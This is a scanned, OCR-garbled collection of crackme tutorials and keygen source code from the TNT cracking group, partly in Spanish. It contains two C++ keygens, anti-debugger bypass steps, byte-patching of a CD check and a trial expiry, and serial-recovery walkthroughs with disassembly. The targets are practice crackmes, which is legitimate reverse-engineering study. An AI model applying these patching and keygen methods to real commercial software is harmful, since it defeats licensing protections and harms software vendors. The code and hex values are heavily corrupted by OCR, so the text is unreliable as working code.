[-HKEY_CLASSES_ROOTCLSID(7FDO366B-9767-4DEE-8303-448027D423AD)] 


[-HKEY_CLASSES_ROOTWCLSID(F2344C12-AAC9-4817-A553-A8022BFF604D)] 


ttinclude <iostream.h> 
HHnclude <stdio.h> 
ttinclude <string.h> 
ttinclude <ctype.h> 


ttdefine kKTAM 1000 
unsigned short V1,V2,V3,V4,V5,V6,vector_4[kTAM]; 


void 

fun40100A( int num ) 
( 

V3=V3>>1; 

if(num) V3=V3|0x80; 
V4--; 

1£(1V4) 

1£(VS5<0xPD) [ 

__asm( 

mov cx,V5 

mov dx,V3 

mov byte ptr [ecx+vector_4],dl 
) 

V4=38; 

VS++; 

) 

) 


void 
fun401019( int num >) 
[ 


int temp; 


fun40100A(num); 
(VO) 

temp=0; 
1f(num==0) temp=1; 
num=temp; 

dol 
fun40100A(num); 
V6--; 

)while(V6); 

) 

) 


void 

main( void ) 

( 

unsigned vector_1[]= 
(0x3FEE,0x3A9B,0x3977,0x37A4,0x3583,0x3019,0x2F86,0x2E55 
,0x2BD1,0x2836,0x2746,0x25DF,0x22A8,0x20A0,0x1CE6,0x1996 
,0x18C8,0x18C1,0x13EB,0x111F,0OxX0OEAE,0x0D6F,0x0CD8,0x0BE2 
,¿0x0BD2,0x0ACB,0x0A8C,0x044F,0x0000); 

unsigned vector_2[]=[0x7A01,0x49A0,0x534F]; 

char cadena[kTAM],vector_3[kTAM],temp[kTAM],serial[kTAM]; 
int 1,j,1on,t1,t2,t3; 


cout<<" ======================================="< <endl; 
cout<<"Keygen para el Crackme+tl en VC++ de TNT"<<endl; 


cout<<" ======================================="< <endl; 
cout<<"Realizado por 'El Pollo'""<<endl; 


cout<<"========================"<<endl<<endl; 

dol 

lon=kTAM; 

printf("NOTA: Max 19 caracteres y al menos 5 de ellos han de ser letras o espaciolnIntroduce un nombre: "); 
gets(cadena); 


if(strlen(cadena)>19) cadena[19]="0"; 
for(i=0,j=0;i<strlen(cadena);i++)( 
cadenal[i]=toupper(cadenali])); 
if(isalpha(cadena[i)) || isspace(cadenal[i)))( 
cadenal[j]=cadenali]; 

j++; 

) 

) 

cadena[j]="0'; 

lon=strlen(cadena); 

)while(lon<=5); 

lon/=6; 

lon++; 
for(i=0,j=1;i<strlen(cadena);j++,i+=lom)( 
if(isspace(cadenal[1])) vector_3[j]=0x1B; 
else vector_3[j]=cadena[1]-0x40; 

) 

vector_3[0]=0x1; 

vector_3[j]=0x1C; 

vector_3[j+1]=M0'; 

j++; 


V1=0xFFFF; V2=V3=V5=V6=0; V4=38; 
for(i=0;1<j;1++)( 

t1=V1-V2+1; 
t2=vector_1[vector_3[1]-1]*t1; 
12/=0x3FEE; 

2+=(V2-1); 
t3=vector_1[vector_3[1]]*t1; 
t3/=0x3FEE; 

1(3+=V2; 

V1=1t2; 

V2=13; 


do[ 
1£(V1<0x8000) fun401019(0); 
else( 
1£(V2>=0x8000) ( 
V1+=0x8000; 
V2+=0x8000; 
fun401019(1); 

) 

else( 
1£(V2>=0x4000) ( 
1£(V1<0xC000y( 
V1+=0xC000; 
V2+=0xC000; 
Vó++; 

) 

else break; 

) 

else break; 

) 


) 
V1=V1<<1; 
Vl++; 
V2=V2<<1; 
)while(1); 

) 


1£(VS5>=2)( 
fun401019(1); 
1£(V4<8)( 
V3=V3>>V4; 
(VI) ( 
__asm( 

mov cx,V5 
mov dx,V3 
mov byte ptr [ecx+vector_4],d1 
) 

VS++; 

) 

) 

__asm( 

mov cx,V5 
mov dx,V3 
mov byte ptr [ecx+vector_4],00 
) 

VS++; 
V5=V5>>1; 

) 


else cout<<"MERROR: No existe un numero valido para este nombre"<<endl; 


for(i=0;¡<V 5 ;i++)( 

sprintf(temp,"%d" (vector_4[i]vector_2[1])); 
if(strlen(temp)<5) 
for(¡=0;j<5-strlen(temp);j++) 
strcat(serial,"0"); 

strcat(serial,temp); 


) 
1£(V5<3) strcat(serial,"103155"); 


1f(strlen(serial)==16) cout<<"nSu numero de serie: "<<serial<<endl; 
else cout<<"MERROR: No existe un numero valido para este nombre"<<endl; 


return; 


) 


HHnclude <iostream.h> 

HHnclude <stdio.h> 

ttinclude <string.h> 

ttinclude <ctype.h> 

ttdefine kKTAM 1000 

unsigned short V1,V2,V3,V4,V5,V6,vector_4[kTAM]; 


void 


fun40100A( int num ) 
[ 

V3=V3>>1; 

if(num) V3=V3|0x80; 
V4--; 

1£(1V4) 

1£(V5<0xPD) [ 

__asm( 

mov cx,V5 

mov dx,V3 

mov byte ptr [ecx+vector_4],d1 
) 

V4=38; 

VS++; 

) 

) 


void 
fun401019( int num >) 
[ 


int temp; 


fun40100A(num); 
(VO) 

temp=0; 
1f(num==0) temp=1; 
num=temp; 

dol 
fun40100A(num); 
V6--; 

)while(V6); 

) 

) 


void 

main( void ) 

[ 

unsigned vector_1[]= 
(0x3FEA,0x3A9B,0x3977,0x37A4,0x3583,0x3020,0x2F86,0x2E55 
,0x2BD1,0x2636,0x2746,0x25DF,0x22A8,0x20A0,0x1CE6,0x1999 
,0x18C8,0x18C1,0x13EB,0x121F,0OxX0EAE,0x0D6F,0x0CD8,0x0BE2 
,¿0x0BD2,0x0ACB,0x0A8C,0x044F,0x0000); 

unsigned vector_2[]=[0x6A02,0x48A0,0x345F); 

char cadena[kTAM],vector_3[kTAM],temp[kTAM],serial[kTAM]; 
int 1,j,1on,t1,t2,t3; 


cout<<"======================================="<<endl; 
cout<<"Keygen para el Crackme+t2 en VC++ de TNT"<<endl; 
cout<<"======================================="<<endl; 
cout<<"Realizado por 'El Pollo'"<<endl; 

cout<<" ========================"<<endl<<endl; 

dol 

lon=kTAM; 

printf("NOTA: Max 19 caracteres y al menos 5 de ellos han de ser letras o espaciolnIntroduce un nombre: "); 
gets(cadena); 

1f(strlen(cadena)> 19) cadena[19]="0"; 

for(i=0,j=0;i<strlen(cadena);i++)( 

cadenal[i]=toupper(cadenali])); 


if(isalpha(cadena[i)) || isspace(cadenali)))( 
cadenal[j]=cadenali]; 

JE 

) 

) 

cadena[j]="0'; 

lon=strlen(cadena); 

)while(lon<=5); 

lon/=6; 

lon++; 
for(i=0,j=1;i<strlen(cadena);j++,i+=lom)( 
if(isspace(cadenal1])) vector_3[j]=0x1B; 
else vector_3[j]=cadena[1]-0x40; 

) 

vector_3[0]=0x1; 

vector_3[j]=0x1C; 

vector_3[j+1]="0"; 

j++; 


V1=0xFFFF; V2=V3=V5=V6=0; V4=38; 
for(i=0;1<j;1++)( 

t1=V1-V2+1; 
t2=vector_1[vector_3[1]-1]*t1; 
12/=0x3FEE; 

2+=(V2-1); 
t3=vector_1[vector_3[1]]*t1; 
t3/=0x3FEE; 

1(3+=V2; 

V1=12; 

V2=13; 


dol 
1£(V1<0x8000) fun401019(0); 
else( 
1£(V2>=0x8000) ( 
V1+=0x8000; 
V2+=0x8000; 
fun401019(1); 

) 

else( 
1£(V2>=0x4000) ( 
1£(V1<0xC000)( 
V1+=0xC000; 
V2+=0xC000; 
Vó++; 

) 

else break; 

) 

else break; 

) 

) 

V1=V1<<x1; 
Vl++; 
V2=V2<<1; 
)while(1); 

) 


i£(VS>=2)[ 
fun401019(1); 
i£(V4<8) 


V3=V3>>V4; 

(VI) ( 

__asm( 

mov cx,V5 

mov dx,V3 

mov byte ptr [ecx+vector_4],d1 
) 

VS++; 

) 

) 

__asm( 

mov cx,V5 

mov dx,V3 

mov byte ptr [ecx+vector_4],00 
) 

VS++; 

V5=V5>>1; 

) 


else cout<<"MERROR: No existe un numero valido para este nombre"<<endl; 


for(i=0;¡<V 5 i++) ( 

sprintf(temp,"%d" (vector_4[i]fvector_2[1])); 
if(strlen(temp)<5) 
for(¡=0;]<5-strlen(temp);j++) 
strcat(serial,"0"); 

strcat(serial,temp); 


) 
1£(V5<3) strcat(serial,"2154587565"); 


1f(strlen(serial)==20) cout<<"nSu numero de serie: "<<serial<<endl; 
else cout<<"MERROR: No existe un numero valido para este nombre"<<endl; 


return; 


) 


TNT! CrackMe %]1 tutorial by - [NIO]-shai 


hello to all TNT! crack team 1 just want to say : keep giving us those CrackMe's it make us lern some new things about 
cracking and to lern new kind of protection . 


ok so let's begin to crack .... 


first of all let me tell u that the prog is writen in VB so that meen that we can crack the prog BY SI. 


use softice to break on : bpx msvbvm60!__ vbastrcomp 


using softice to crack : 


so first of all u need to Open winice.dat in your softice directory and do thise: 


exp=cwindows|isystemimmsvbvm60.dll 


thise is the way to make sofice to break into VB prog u must reboot to make work. 


Ok ... fire up softice and let us begin. 1f u will try to open the CrackMe it will give u a message that is saying that Softice 
1s detected so we are going to by pass this simpel anti 


soft ice . the prog when u open it is trying to make a file called : SICE.VXD 
so we will use : bpx createfilea 
press Ctrl+D type:" bpx createfilea " and the FS 


open agin the prog and we are back in softice count how mutch times 1t breaks by pressing F5 and making sofice break 
over agin 1 counted : 3 


ok so now reopen the prog and softice is breaking agin and press 2 times ES 1f u will press agin u will get the error msg 
so press F11 to get the caller and u will see thise : 


mov edi, [MSVBVM60! _vbaSetSystemError] 
mov esi, eax 

call edi 

lea ecx [MSVBVM60! _vbaFreeStr] 

cmp esi,-01 


a el (NO JUMP) 


step with FlO till u get to zz DO NOT CONTIUE as u can see if u press F10 agin 1t won't jump so let's make it jump by 
typin: rflz 


ok , so u see the prog wil jump so now press ES . 


e o0o0ps **** softice break agin at creatfilea but ifu will press F11 to get caller u will see it is the same thing like 
before so step with F10 till jz do r fl z and the F5 and here we now can continue 


now we have by pass the anti-softice but befor let's do :" bc *" to clear break points . 


now go to the help menu and choos Register type any name u would like and any serial number 


BUT DO NOT PRESS REGISTER !!! 


ok now press Ctrl + D and type : bpx msvbvm60!__vbastrcomp 
Ok now press ES and press register softice breaks 


u will see : 


cmp dword ptr [esp+04], 00000002 
je 6608FB24 

push 00030001 
push [esp+08] 


push [esp+10] 


push [esp+18] 


call dword ptr [66110010] ; Trace into this Call by perssing F8 


ok now u should see this : 


push ebp 
mov ebp, esp 
push ecx 


push ebx 


push esi 


mov esi, dword ptr 


push edi 


test esi, esi 


jne 653C1140 
and dword ptr 


mov ecx, dword ptr 


test ecx, ecx 


jne 653C1148 


xor ebx, ebx 


cmp dword ptr 


mov edx, dword ptr 


Job 653C110A 


mov edx, ebx 


mov eax, dword ptr 


test eax, eax 


jne 653C116C 


test edx, edx 


je 65301175 


mov eax, edx 


shr eax, 1 


mov dword ptr 


mov edi, dword ptr 


mov esi, dword ptr 


mov ecx, dword ptr 


xor eax, eax 


[ebp- 


[ebp- 


[ebp+10], 


[ebp+08] 


041, esi 


[ebp+0C] 


041, ebx 


[ebp-04] 


[ebp+10] 


eax 
[ebp+0C] 


[ebp+08] 


[ebp+10] 


, 


, 


EDI 


contains the s/n 


ESI the entered STRING 


ok now if u wish to see youre enterd number do : d edi 


TO SEE THE REAL SERIAL NUMBER DO : D ESI 


THAT'S ALL AND IT DOES WORK . 


MY SERIAL NUMBR : 


NAME : NIO 


SERIAL : B5BE00E7 


NIO 


TNT CrackMe +18 tut by - KlimaX 


Hi to everyone at TNT, thanks for putting up all these CrackMe's, they're great. Don't ever stop..... 


Tools required: 


Wdasm with VB support 


Hiew 


Patch Creation Wizard 


How To: 


1. To begin with make a copy of the CrackMe_CD-Check.exe (rename it as e.g. CrackMe_CD- 


Check.wdm to aviod having two equal files), as you will need this in the patching process. 


2. Start Wdasm (the reason you'll need VB support is, that this CrackMe is written 1 VB, and you 


won't get the same results as me, without). 


3. Disassemble the original CrackMe_CD-Check.exe, and press the SDR icon. 


4. Okay, this CrackMe uses two SDR strings in it's protection scheme. The first string we need to 
change is the "CD-ROM" string. 
Scroll up a bit and place the bar on the 00404B09 JE code. Now you need to note the Ooffset 


number (mine is 4B09) 


5. The next string we want to change is the "Por favor, inserte un CD!”. 


Scroll up and place the bar on the 0040473C JNE code, and note the offset number (mine is 


473C) 


6. Great! now we've found our two strings and their GCoffset numbers, so let's fire up Hiew and open 
the CrackMe_CD-Check.bak 
Press F4 and select decode. Press F5 and type 4B09, and you'll be at the JE code. Now press F3 


and change the 74 to 75 (JE <-> JNE). Finally press F9 to save changes. 


Great!!! First part complete :) 


7. Now press F5 again, and type the second Ooffset number 473C. Press F3 and change the 85 to 84 


(INE <-> JE). Now press F9 to save, and F10 to exit Hiew. 


If you had made these changes on the original CrackMe_CD-Check.exe, you could now start it and find that it's cracked and functional. But I'm not 
satisfied yet ;), cause I thought it would be nice to f11l out some time with making a patch, so let's go... 


1. Start Patch Creation Wizard, and select Byte Patch. Now type in something like "CrackMe 18 


patch", in the Your Handle box, and "CrackMe_CD-Check"” in the Target Title box. 


2. In the Target File box, choose the original CrackMe_CD-Check.exe, and press next 


3. Choose the original CrackMe_CD-Check.exe again, in the Original File box, and select our 


patched CrackMe_CD-Check.bak in the Patched File box. Press next, and our patch is now 


created.....Hurray, done. 


Now try deleting the CrackMe_CD-Check.bak file from your PC, and run the patch in the 


CrackMe directory. Decent job, right! ;).. 


Greetz to: 


Everybody at TNT. 


How to crack EB's CrackMe +9 


Target : vocrackme9.zip 
Tools used : Notepad 


Smartcheck 6.03 


| will not repeat about how to set smarcheck for our debbug, it is well (and more) 
described at Eternal bliss website. 


About this serial routine 


Ok, first run SC, in the File/Open menu choose VBCrackMe9.exe, and with F5 run it 
As we saw in the text file, we can't just type in the name and the code, so, ¡ used 


Notepad as a text editor. Cut the name and click on the small square near the name 
box, and do the same for the code. 


¡ used name : the snake 
code : 123456789 
All the info that SC gave us by now wasn't important, but from now, take a good look 


Click on the 'register' button and look for this info : 
Textl.Text 


Text2.Text 
Textl.Text 
Text2.Text 
Istremp(LPSTR:00410650...) <<<< important line !!! 


Left mouse click on this line will show us this in the right window of Smartcheck : 


signed char * IpStringl =004105A8 
|_="8h2 7n16k2" 
signed char * IpString2 = 004105E0 
|_="123456789" 


Well, at this point i can see that part of the "name format" is used in the real code : 
Moocxxxx.." and i can see that some of the letters ¡ typed in, are there as well. 

So, I'll try another name :"a b c d e" with code : 123456789 

and in SC ['ve got : 


signed char * IpStringl = 00410560 
|_="16171812" << same format as the name : "xxxxx" !!! 


signed char * IpString2 = 004105F0 
|_="123456789" 


Hmmm, ¡think ¡ got the idea, the 1st, 3rd, 5th, 7th.... chars get some hardcoded value 
from like a translation-table in the prog. 
the 2nad, 4th, 6th, 8th ... chars are not changed, and used as they are in the code. 
To check it, type in name : 
"a b cdefghijklmnopqrstuvw x yz 


and you get in smarcheck as code: 
"5161718 12345678 9102345678 91011 345" 


attention : '* (blank) = 5.. 


It looks like what i thought it will be, so ¡ go for the final check : 
name : last try 

code : 9a7t5tby 

WOW, | got the "Great Work..." pop-up window... 

Job done... 


Final Notes 


This was my first VB6 crack, and first time using Smartcheck as well. 


Thanks to Eternal Bliss for all the help he is giving us on the newbies forum, and for 
all other stuff like this crackme's. 


The Sandman for all that he is doing for us, newbies. 


Rhayader for helping me with Reverse Code Engineering and 
useful tips 


all my other essay's can be found here 


Hi!!! 

> 

> I've got no time to write a complete tutorial. Maybe in german, yes, but in 

> english better not! *gg* 

> 

> Okay, how have I did it ?? 

> 

> First, I just run the crackme an look what it do. Runs fine, but the stupid 

> buttons are disabled. No problem...restart with a BPX on EnableWindow. Hm... 
> but the proggy execute this so often that you can't find the right addr on 

> this way as easy as I want. A good solution seems to be the Handle. A look 

> in the EXE-Resource will help extrem. Then I just search for 'push 3ED' 

> and 'push 3E8'. HIEW and search for 68,ED,03,00,00. **BOOM** found. What 
> must I see there ? A 'PUSH 00'...fast changed into 'PUSH 01' and no crippled 
> buttons anymore! *g* 

> 

> Now it's time for the calculation. Such a horrible Code have 1 see rare. *g* 

> But okay, after a bit of trace 1t's quite easy to see that many many Names 

> are locked..TNT-Memoberss I think! :-)) 

> The rest of the algo is very confused and based on some hardcoded stuff. Then 
> the main surprise at the _wsprintf-Function. The real code is standing in the 

> memory. Not very clever or ?? *g* 

> Okay 1t's just build when the Name has the right format but more easy as I 

> thought. After all 1t's not difficult. An easy CrackMe as I would say... 

> 

> The last part is the keygen, completly based on the original Code. I 

> disassembled the code, optimised a bit, and copy/paste it. After a litte 

> errorchecking it was done, the KegGen. All in all a half day is needed! ;-) 

> 

> Oh, befor I forget. The SICE detecting trick is too old to take effect. Also 

> the nice ANTEDISASSEMBLE trick wasn't hard. Section .text Charactaristic has 
> been modified to 00000000h. A change to 60000040h will fool tools like 

> W32DASM. 

> 

> That's it..... 

> (c) sSNoOfy '200(0/1) 

> 

> PS: Next time I will use the original TNT tools to make .diz 8 .nfo files!! 

> 

> CU 


Demian VB2 CrackMe TNT 20 
Ok here is the solution and the info you need to make your own key. 


First you got to bypass some of the debugger detection. I use a modified 


version of SmartCheck on this CrackMe. 

There is some looking for winice in the autoexec.bat, meltice checks and a few 
registry checks looking for uninstall strings for softice and smartcheck. 

Tools l used SmartCheck and W32Dasm89 


After all the debugging checks is done. Take your testname 

Step 1: 

Tll use Black Jack. Convert the first 3 char to upper case. 

BLA Now get the DEC equiv for each Char and make it a string. 
667665 


Now in the program the author uses some permanent code checks 
the string '686986', '=' and ';:46$' 


In the 2nd line of the key the 1st Perm code gets pushed on the 
string the rest of Step1 is then added to the string. 

So in the 2nd line you enter 686986 + Stepl 

686986667665 


Step 2: 

Take your name and convert it to Dec in the same case you entered it. 

Be sure to include the space 1f you used one. Drop the 1st Char and add 4 
to the rest of the integers. 


:004075EE C1E604 shl esi, 04 
:004075F1 8BC6 mov eax, esi 


Black Jack 


66 drop 
108 112p 
97101 e 
99 104 g 
107 1110 
3236 $ 
7478 N 
97101 e 
99 103 g 
107 1110 


Now convert your new number back to a Char string. 
pego$Nego 


Now take the last char 'o' from Step2 + the 2nd Perm code '=' + Stepl1 + Step2 + 3rd Perm 
code ';46$' in one long string. 

o=667665pego$Nego;46$ 

Put that in your 3rd line. 


Step 3 
This may not be 100% There are 4 values that get pushed and for some reason on 
my value is always 4E20 (20000) 


:00407932 C78574FFFFEF00000000 mov dword ptr [ebp+-FFFFFF74], 00000000 
:0040793C C78528FFFFFF08800000 mov dword ptr [ebp+-FFFFFEF28], 00008008 
:00407946 C785FOFEFFFF204E0000 mov dword ptr [ebp+FFFFFFEFO], 00004E20 
:00407950 C785E8FEFFFF02000000 mov dword ptr [ebp+-FFFFFEE8], 00000002 


So in line one enter in 4E20 if it fails then look to one of the others listed. 


Oh there is a trick here. You have to go back and delete a char from line 3 
and enter it in again. The program will not excute any checks till line 3 has 
something entered. Every key pressed in line 3 will excute a serial check. 


Black Jack 


4E20 
686986667665 
o=667665pego$Nego;46$ 


Little time for cracking or making keygens lately. There is enough info for 
you make your own key generator. 


Greets to all 

Have a Merry Christmas! 
and 

Happy New Year! 


Jack 


TNT-Demian. VBCrackME_Trial_N15 Tutorial 


Arrancamos el programa, y no hace absolutamente nada. Puede ser que haya detectado el SICE. 

Arrancamos el Frogsice, para esconder el debugger, y volvemos a ejecutar el programa. 

Pero sigue sin hacer nada. 

Arrancamos Filemonitor, para ver que ficheros toca. Y Sorpresa, ¡¡ha leido el Autoexec.bat!! 

Vamos, que lo que hace es buscar alguna referencia al Winice.exe en el Autoexec, y si lo encuentra, se para. Bueno, 
renombramos el Autoexec para ver que pasa, y mira por donde, ahora funciona (Je je, pero por que tenemos el Frogsice 
ejecutandose). Si quitamos el Frogsice, vemos como al ejecutar el programa, se para como al principio. 


Bueno, por lo menos ya sabemos como funciona el programa, otra cosa es como atacarle. 

Abrimos el SICE, y pensamos un instante, vamos a poner un breakpoint en vbaEnd, que es la funcion, que sale de los 
programas de VB. Ponemos 'bpx msvbvm60!__ vbaEnd'. Y pulsamos CTRL+D. 

Y se nos para el SICE. Pero se nos para dentro de la propia rutina. No Problem. Editamos con el comando 'a', y 
ponemos un simple 'ret'. 

Ejecutamos el ret, y vemos la llamada al vbaEnd. Y justo encima, vemos un salto condicional (JE), que si nos fijamos 
bien, salta justo despues del vbaEnd :-D 

Bien, apuntamos la dirección, para parchearla después poniendo un simple JMP. 


Y repetimos la operación hasta que no haya más vbaEnd (Unas 6 veces). No siempre se soluciona con un JMP, a veces, 


es necesario Nopear (la segunda vez). 
Bien, ahora el programa funciona, tanto si tenemos el sice, como si no. Pero, si adelantamos un mes la fecha, nos sale el 


temido "Your Trial version is expired". 


Bien, ahora, solucionaremos la protección de fecha, abrimos el W32DasmVB, y desensamblamos el ejecutable, 
buscamos la la cadena de antes, y vamos un poco más arriba, veremos otro salto condicional (JE xxxxx), solo hace falta 
cambiarlo por un JMP. 

Pero ahora es un poco más complicado, porque lo que hay que convertir en un JMP no es la típica sentencia 740D, si no 
esta otra 0F84D3000000. Pero, entramos el SICE, ponemos un Breakpoint a dicha instrucción y con el comando 'a”, 
ponemos el JMP a donde corresponda, y copiamos los bytes, que deben quedar así E9D400000090. 


Y ya está. El programa funcionará siempre, con o sin el SICE. Y da igual la fecha que pongas. Eso si, no hagas mucho 
caso a los dias restantes :-D 


Txotxo 


First let me say I have never written any How To's on cracking. This is my First 


Tools Needed 
Soft Ice 
WinDASM 
Smart Check 
Filelnfo 
Xpcrypt 
Calculator 


First thing I did was run the exe file through FilelInfo and see that it is packed with PE Crypt. 
T'm not that experienced with the unpacking PE Crypt so I used the easy way out and used 
Xpecrypt to get the upacked exe. Why make more work when I don't need to? 

Did a dead listing with WinDASM VB6? So I will use SmartCheck 

Fired up SC and typed in my name and code 

Black Jack 

12 12345678 12345678901234 


SC shows it looks up some info in the Registry ie Windows Registration 
Nothing really interesting (no compares) 

Then the date is being read in the day month year format 

It strips the day and month to a dec number and XOR them. 

After that bad cracker message 

So I took the date and month and XOR it. 8 XOR 13 = 5 Try it again (Aug 13) 
5 12345678 12345678901234 


SC now goes a bit further past the date. So I now know what my 1st entry must be 


Going down the SC The value is checked against length is equal to 8. I see my name is being read twice and being 
converted to ascii 

This looks interesting. I go further down to see where the Bad Cracker Message is. 

Right above that there is String Compare. 

12345678 

S5CBOOFE1 

Black Jack 


Try this again 
5 5CBOOFE1 12345678901234 


SC goes a further again. This time it SC reports a Double Compare with 12345678901234 

Well so much for SC. Time for Soft Ice 

I take a look at the dead listing of my unpacked program and compare with the double compare. 

Looks like me break point is going to be vbaR8Str. I try this and have no luck finding the true serial. 

So I take better look at the dead listing. Find the Good Cracker Message (Congratualations) and start back tracing. 
I find my vbaRSStr ref. Keep tracing up see if I can catch the serial before the compare. 


There are a lot of math going on here so I set my breakpoint to see what is going on. 


:00460081 8B3D74104000 mov edi, dword ptr [00401074] 

:00460087 DDODCOFEFFFEF fstp qword ptr [ebp+FFFFFFECO] ->move next value from name 
:0046008D DD85COFEFFFF fld qword ptr [ebp+FFFFFECO] 

:00460093 DC45C4 fadd qword ptr [ebp-3C] ->add the sum again 

:00460096 DB85BCFEFFFF fild dword ptr [ebp+FFFFFEBC] 

:0046009C DD9DB4FEFFFF fstp qword ptr [ebp+FFFFFEB4] 

:004600A2 DC85B4FEFFFF fadd qword ptr [ebp+FFFFFEB4] ->add the constant 
:004600A8 DD5DCA fstp qword ptr [ebp-3C] 

:004600AB DFEO fstsw ax ->dl ebp-3c store the math 

:004600AD A8O0D test al, OD 

:004600AF 0F85C3010000 ¡ne 00460278 

:004600B5 B801000000 mov eax, 00000001 

:004600BA 6603C3 add ax, bx 

:004600BD OF80BA010000 jo 0046027D 

:004600C3 8BD8 mov ebx, eax 

:004600C5 EB86 ¡mp 0046004D ->loop 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00460054(C) 


| 

:004600C7 BB01000000 mov ebx, 00000001 
:004600CC BA24000000 mov edx, 00000024 
:004600D1 8BCB mov ecx, ebx 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:004600F8(U) 


:004600D3 663BCA cmp cx, dx ->cmp counter to 36 
:004600D6 7F22 jg 004600FA 

:004600D8 DD45C4 fld qword ptr [ebp-3C] 
:004600DB DCCO fadd st(0), st(0) ->double the value 
:004600DD DD5DC4 fstp qword ptr [ebp-3C] 
:004600E0 DFEO fstsw ax ->Store the math dl ebp-3c 
:004600E2 A80D test al, OD 

:004600E4 0F858E010000 jne 00460278 

:004600EA 668BC3 mov ax, bx 

:004600ED 6603C1 add ax, cx 

:004600F0 0F8087010000 jo 0046027D 

:004600F6 8BC8 mov ecx, eax 

:004600F8 EBD9 ¡mp 004600D3 ->loop 


After a lot of F10 I see a patern. BTW since this is going to be a Double Compare we 
have to use the DL in SI 

1st the First letter my name is converted to ascii B (66) 

It is stored as a constant. Then my 1st letter 18 added to 66. 


132 my second letter is pushed on and so is 66 again. 


+ 132 (sum) 

+ 108 (1) 

+ 66 (constant) 
= 306 (new sum) 


+ 306 (sum) 

+97 (a) 

+ 66 (constant) 

= 469 (new sum) 

So this goes though all my letters of my name. 

T end up with 1546 

Then my number is pushed on where it gets multiplied by 2 and it repeates 

over and over mulipling the result with 2. :004600E0 fstsw ax The number is visable 

dl ebp-3c This goes on about 30 Xs till my value disappears but the loop is still going. 

DL has just reached the max length of the long value. So I count how many times the loop 
continues when the number disappeared. Fire up the MS Calc 

And continue to multiply. After going back and looking at the code in SI I over looked the counter is comparing to 36. 
Take my number 1546 and multply by 2 36 X's 


Anyway l get the number 106240311033856 


Fire it up again and you have passed 
Black Jack 
5 5CBOOFE1 106240311033856 


To make my KeyGen I had to get the pattern of the second serial number. I used WinDasm. 
It is a combination of two parts. 


First my name is converted to ASCII in the first loop 1 to length of name. That 1 digit 1s 
multiplied by 0100 hex and moved to edi. Then the second loop begins 1 to 8. It moves the 
edi to ebx then xor ebx with eax. (eax is where you want to watch the values change, this 
value will end up with the final result from the first part of the serial number.) Now we 

are setting up for a True or False statement. ebx is run through an and FFFF This is 

saying only keep the last four digits. The test bh, 80 takes the first 2 bytes of ebx and 
compares it with an AND 80 so 1f ebx = 8188 the statement is 81 AND 80 = (True or False) 
Now in both directions of the jne the value of eax is compared to FFFFFFF this drops the 1st digit off. If you were to 
look at the number in dec 1t gets quite large this limits a 

buffer overflow. Both directions also multiply the number by 2. How ever if the value of 

bh = True Xor eax by 1031. Both directions end up at the same place multiply edi * 2 before 
continue the second loop. This runs through t11l 1st loop is complete. 

Add 62 to the result of eax after the loop 1. You see the AND FFFF function again. Use the 
last 4 digits in from HEX and there is the 1st part of the serial. 


:00460C0D 3B8DESFEFFFF cmp ecx, dword ptr [ebp++-FFFFFEES8] 
:00460C13 0F8FCCO00000 jg 00460CES ->Completed 1st Loop Jump 


:00460C3E FF1530104000 Call dword ptr [00401030] 
:00460C44 6669C00001 imul ax, 0100 ->Multiply digit by 0100 
:00460C49 OFSOBA030000 jo 00461009 


:00460C4F 8D4DCC lea ecx, dword ptr [ebp-34] 
:00460C52 OFBFF8 movsx edi, ax ->Move to edi 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:00460CC8(U) 


| 

:00460C6E BB08000000 mov ebx, 00000008 
:00460C73 3BCB cmp ecx, ebx ->Counter compare to 8 
:00460C75 7E53 jg 00460CCA 

:00460C77 8BDF mov ebx, edi ->move edi to ebx 
:00460C79 33D8 xor ebx, eax ->xor ebx with eax 
:00460C7B 81E3FFFF0080 and ebx, SODOFFFF 
:00460C81 7908 jns 00460C8B 

:00460C83 4B dec ebx 

:00460C84 81 CBOO0OFFFF or ebx, FFFFO000 
:00460C8A 43 inc ebx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00460C81(C) 


| 

:00460C8B F6C780 test bh, 80 ->True Jump 
:00460C8E 7510 jne 00460CAO 

:00460C90 25 FFFFFFOF and eax, OFFFFFFF 
:00460C95 6BC002 imul eax, 00000002 ->eax * 2 
:00460C98 0F806B030000 jo 00461009 
:00460C9E EB13 ¡mp 00460CB3 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00460C8E(C) 


:00460CA0 25FFFFFFOF and eax, OFFFFFFF 
:00460CAS5 6BC002 ¡mul eax, 00000002 ->eax * 2 
:00460CA8 0F805B030000 jo 00461009 

:00460CAE 3531100000 xor eax, 00001031 ->xor 1031 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00460C9E(U) 


| 

:00460CB3 6BFFO02 ¡mul edi, 00000002 ->Multiple product by 2 
:00460CB6 SBDA mov ebx, edx 

:00460CB8 0F804B030000 jo 00461009 

:00460CBE 03D09 add ebx, ecx ->add 1 to counter 

:00460CC0 0F8043030000 jo 00461009 

:00460CC6 8BCB mov ecx, ebx 

:00460CC8 EBA4 jmp 00460C6E ->Continue 2nd Loop 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:00460C75(C) 


:00460CCA 8B55E8 mov edx, dword ptr [ebp-18] 
:00460CCD B901000000 mov ecx, 00000001 
:00460CD2 03CA add ecx, edx ->add 1 to counter 


:00460CD4 8945DC mov dword ptr [ebp-24], eax 
:00460CD7 0F802C030000 jo 00461009 

:00460CDD 894DE8 mov dword ptr [ebp-18], ecx 
:00460CEO0 E928FEFFFFF ¡mp 00460C0D ->Continue 1st loop 


Final Step of 1st part of Serial 


:00460CE5 83C062 add eax, 00000062 ->eax is from loop 1 add 62 
:00460CE8 0F801B030000 jo 00461009 

:00460CEE 25FFFF0OO080 and eax, SODOFFFF ->get hex value last 4 digits 
:00460CF3 7907 jns 00460CFC 


EAX is your 1st part of the second serial number 


Second Part of Seral 

Again my name is converted to ASCII in a loop. The 1st digit is O instead of 1 
The 1st digit is multiplied by the digit location and all totals are added 

66 108 97 99 107 32 74 97 99 107 

0123456789 


0 108 194 297 428 160 444 679 792 963 Sum = 4063 (FE1) 


:00460D43 FF1530104000 Call dword ptr [00401030] 
:00460D49 8BD7 mov edx, edi 

:00460D4B OFBFC8 movsx ecx, ax 

:00460D4E 83EA01 sub edx, 00000001 

:00460D51 0F80B2020000 jo 00461009 

:00460D57 OFAFCA ¡mul ecx, edx ->multiply digit by counter 
